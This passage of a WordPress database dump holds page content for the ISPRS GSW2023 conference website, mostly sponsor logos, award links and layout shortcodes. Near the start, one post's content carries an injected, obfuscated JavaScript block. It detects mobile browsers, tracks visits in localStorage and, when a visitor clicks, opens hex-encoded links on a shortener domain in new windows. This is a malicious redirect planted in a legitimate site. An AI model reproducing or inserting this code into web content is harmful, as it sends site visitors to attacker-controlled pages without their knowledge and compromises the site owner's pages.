main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_NEW','','inherit','closed','closed','','3063-revision-v1','','','2022-11-08 21:14:13','2022-11-08 21:14:13','',3063,'https://gsw2023.com/?p=3064',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3066,1,'2022-11-08 21:28:30','2022-11-08 21:28:30','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/Best presentation award GSW2023.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best_presentation.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Presentation Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 